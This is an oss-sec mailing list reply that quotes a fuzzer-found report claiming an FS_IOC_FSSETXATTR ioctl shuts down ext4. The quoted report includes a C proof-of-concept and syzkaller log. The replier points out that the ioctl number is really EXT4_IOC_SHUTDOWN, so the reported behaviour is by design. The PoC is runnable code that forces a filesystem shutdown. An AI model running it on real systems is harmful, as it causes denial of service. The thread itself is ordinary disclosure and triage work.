oss-sec mailing list archives
Re: Linux kernel: FS_IOC_FSSETXATTR will lead to EXT4-fs shut down
From: Xiami <pengyu.tao () yooli com>
Date: Tue, 28 Aug 2018 17:45:37 +0800
On Tue, Aug 28, 2018 at 08:27:50AM +0000, zhrzhang(张洪睿) wrote:
Hello: when I fuzz,I found the kernel will always no output from machine, and error FS_IOC_FSSETXATTR contribute to this. the syzlog is as below: r0 = creat(&(0x7f0000000140)='./file0\x00', 0x0) ioctl$FS_IOC_FSSETXATTR(r0, 0x8004587d, &(0x7f0000000080)={0x0, 0x0, 0x0, 0x8})
Your ioctl command 0x8004587d is exactly EXT4_IOC_SHUTDOWN defined in fs/ext4/ext4.h
the poc will show like this: #define _GNU_SOURCE #include <endian.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> uint64_t r[1] = {0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0); long res = 0; memcpy((void*)0x20000140, "./file0", 8); res = syscall(__NR_creat, 0x20000140, 0); if (res != -1) r[0] = res; *(uint32_t*)0x20000080 = 0; *(uint32_t*)0x20000084 = 0; *(uint32_t*)0x20000088 = 0; *(uint32_t*)0x2000008c = 8; *(uint32_t*)0x20000090 = 0; *(uint64_t*)0x20000098 = 0; syscall(__NR_ioctl, r[0], 0x8004587d, 0x20000080); return 0; } ________________________________ zhrzhang(张洪睿)
Current thread:
- Linux kernel: FS_IOC_FSSETXATTR will lead to EXT4-fs shut down 张洪睿 (Aug 28)
- Re: Linux kernel: FS_IOC_FSSETXATTR will lead to EXT4-fs shut down Xiami (Aug 28)